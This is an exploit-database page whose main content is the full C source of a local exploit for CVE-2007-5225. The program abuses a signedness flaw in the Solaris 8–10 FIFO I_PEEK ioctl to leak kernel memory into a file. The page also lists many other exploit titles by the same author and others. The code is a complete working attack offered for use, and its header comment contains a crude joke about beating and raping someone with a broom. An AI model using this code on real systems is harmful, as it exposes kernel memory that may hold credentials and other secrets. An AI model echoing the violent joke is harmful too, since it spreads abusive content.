Search for hundreds of thousands of exploits

"Solaris 8/9/10 - 'fifofs I_PEEK' Local Kernel Memory Leak"

Author

Exploit author

"Marco Ivaldi"

Platform

Exploit platform

solaris

Release date

Exploit published date

2008-03-10

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
/*
 * $Id: raptor_peek.c,v 1.1 2007/10/18 08:09:02 raptor Exp $
 *
 * raptor_peek.c - Solaris fifofs I_PEEK kernel memory leak
 * Copyright (c) 2007 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * [Lame] integer signedness error in FIFO filesystems (named pipes) on Sun 
 * Solaris 8 through 10 allows local users to read the contents of unspecified 
 * memory locations via a negative value to the I_PEEK ioctl (CVE-2007-5225).
 *
 *        /\   AS PART OF A VAST WORLD-WIDE CONSPIRACY              
 *  hjm  /  \   I COMMAND THEE:  BEAT OFF UNTO ME                   
 *      /,--.\                                                      
 *     /< () >\   IF I SAY "FNORD" AT THE END OF A SENTENCE         
 *    /  `--'  \   DOES THAT MAKE ME REALLY FUNNY OR SOMEONE        
 *   /          \   WHO NEEDS TO GET FUCKING BEATEN TO NEAR         
 *  /            \   DEATH AND THEN RAPED WITH A BROOM              
 * /______________\                                                 
 *                  AS YOU CAN SEE THAT'S REALLY TWO JOKES IN ONE
 *                   SO YOU REALLY GET YOUR MONEY'S WORTH HERE   
 * Usage:
 * $ gcc raptor_peek.c -o raptor_peek -Wall
 * $ ./raptor_peek kerndump 666666
 * [...]
 * $ ls -l kerndump 
 * -rwx------   1 raptor   staff     666666 Oct 17 19:33 kerndump
 *
 * Vulnerable platforms (SPARC):
 * Solaris 8 without patch 109454-06 [tested]
 * Solaris 9 without patch 117471-04 [tested]
 * Solaris 10 without patch 127737-01 [tested]
 *
 * Vulnerable platforms (x86):
 * Solaris 8 without patch 109455-06 [untested]
 * Solaris 9 without patch 117472-04 [untested]
 * Solaris 10 without patch 127738-01 [untested]
 */

#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <stropts.h>
#include <unistd.h>
#include <sys/stat.h>

#define	INFO1	"raptor_peek.c - Solaris fifofs I_PEEK kernel memory leak"
#define	INFO2	"Copyright (c) 2007 Marco Ivaldi <raptor@0xdeadbeef.info>"

#define	BADFIFO	"/tmp/fnord"
#define BUFSIZE 1000000

int 	errno;

int main(int argc, char **argv)
{
	int 		fd, fifo;
	size_t		out, bufsize = BUFSIZE;
	char		*buf;
	struct strpeek 	peek;

	/* print exploit information */
	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);

	/* read command line */
	if (argc < 2) {
		fprintf(stderr, "usage: %s outfile [outsize]\n\n", argv[0]);
		exit(1);
	}
	if (argc > 2)
		if ((bufsize = atoi(argv[2])) == 0) {
			fprintf(stderr, "Error (atoi): invalid outsize\n");
			exit(1);
		}

	/* print some output */
	fprintf(stderr, "Using outfile\t: %s\n", argv[1]);
	fprintf(stderr, "Using outsize\t: %u\n\n", bufsize);

	/* prepare the output buffer */
	if ((buf = (char *)malloc(bufsize)) == NULL) {
		perror("Error (malloc)");
		fprintf(stderr, "Hint: Try again with a smaller output size\n");
		exit(1);
	}
	memset(buf, 0, bufsize);

	/* create the named pipe */
	unlink(BADFIFO);
	if (mknod(BADFIFO, S_IFIFO | S_IRWXU, 0) < 0) {
		perror("Error (mknod)");
		exit(1);
	}

	switch(fork()) {
	case -1: 	/* cannot fork */
		perror("Error (fork)");
		exit(1);
	case 0: 	/* the child writes */
		if ((fifo = open(BADFIFO, O_WRONLY, 0)) < 0) {
			perror("Error (open)");
			exit(1);
		}
		write(fifo, "FNORD", 5);
		exit(0);
	default: 	/* the parent reads */
		/* FALL THROUGH */
		;
	}

	/* perform the MAGICK */
	if ((fifo = open(BADFIFO, O_RDONLY, 0)) < 0) {
		perror("Error (open)");
		exit(1);
	}

	memset(&peek, 0, sizeof(peek));
	peek.databuf.buf = buf;
	peek.databuf.maxlen = -1; /* FNORD! */

	if (ioctl(fifo, I_PEEK, &peek) < 0 ) {
		perror("Error (ioctl)");
		close(fifo);
		exit(1);
	}

	/* save output to outfile */
	if ((fd = open(argv[1], O_RDWR | O_CREAT | O_TRUNC, 0700)) < 0) {
		perror("Error (open)");
		close(fifo);
		exit(1);
	}
	out = write(fd, buf, bufsize);

	fprintf(stderr, "FNORD! %u bytes written to %s\n", out, argv[1]);
	fprintf(stderr, "Hint: Try also with a bigger output size\n");

	/* cleanup (who cares about free?;) */
	close(fd);
	close(fifo);

	exit(0);
}

// milw0rm.com [2008-03-10]
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
Release Date Title Type Platform Author
2020-04-21 "Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation" local solaris "Marco Ivaldi"
2020-02-11 "OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution" remote freebsd "Marco Ivaldi"
2020-01-16 "SunOS 5.10 Generic_147148-26 - Local Privilege Escalation" local multiple "Marco Ivaldi"
2019-10-21 "Solaris 11.4 - xscreensaver Privilege Escalation" local solaris "Marco Ivaldi"
2019-10-16 "Solaris xscreensaver 11.4 - Privilege Escalation" local solaris "Marco Ivaldi"
2019-06-17 "Exim 4.87 - 4.91 - Local Privilege Escalation" local linux "Marco Ivaldi"
2019-05-20 "Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)" local solaris "Marco Ivaldi"
2019-05-20 "Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation" local solaris "Marco Ivaldi"
2019-05-20 "Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)" local solaris "Marco Ivaldi"
2019-01-14 "xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab)" local solaris "Marco Ivaldi"
2018-11-30 "xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation" local openbsd "Marco Ivaldi"
2018-10-30 "xorg-x11-server 1.20.3 - Privilege Escalation" local openbsd "Marco Ivaldi"
2009-09-11 "IBM AIX 5.6/6.1 - '_LIB_INIT_DBG' Arbitrary File Overwrite via Libc Debug" local aix "Marco Ivaldi"
2008-03-10 "Solaris 8/9/10 - 'fifofs I_PEEK' Local Kernel Memory Leak" local solaris "Marco Ivaldi"
2007-04-04 "TrueCrypt 4.3 - 'setuid' Local Privilege Escalation" local windows "Marco Ivaldi"
2007-02-13 "Lotus Domino R6 Webmail - Remote Password Hash Dumper" remote windows "Marco Ivaldi"
2007-02-13 "Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timing Attack" remote multiple "Marco Ivaldi"
2007-02-06 "MySQL 4.x/5.0 (Windows) - User-Defined Function Command Execution" remote windows "Marco Ivaldi"
2006-12-19 "Oracle 9i/10g - 'extproc' Local/Remote Command Execution" remote multiple "Marco Ivaldi"
2006-12-19 "Oracle 9i/10g - 'utl_file' FileSystem Access" remote linux "Marco Ivaldi"
2006-11-23 "Oracle 9i/10g - 'read/write/execute' ation Suite" remote multiple "Marco Ivaldi"
2006-10-24 "Solaris 10 libnspr - 'Constructor' Arbitrary File Creation Privilege Escalation (3)" local solaris "Marco Ivaldi"
2006-10-24 "Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (2)" local solaris "Marco Ivaldi"
2006-10-16 "Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (2)" local solaris "Marco Ivaldi"
2006-10-13 "Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (1)" local solaris "Marco Ivaldi"
2006-10-13 "Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (1)" local solaris "Marco Ivaldi"
2006-09-13 "X11R6 < 6.4 XKEYBOARD (Solaris/SPARC) - Local Buffer Overflow (2)" local solaris "Marco Ivaldi"
2006-08-22 "Solaris 8/9 - '/usr/ucb/ps' Local Information Leak" local solaris "Marco Ivaldi"
2006-08-22 "Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure (2)" local solaris "Marco Ivaldi"
2006-07-18 "Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Local Privilege Escalation" local linux "Marco Ivaldi"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/5227/?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.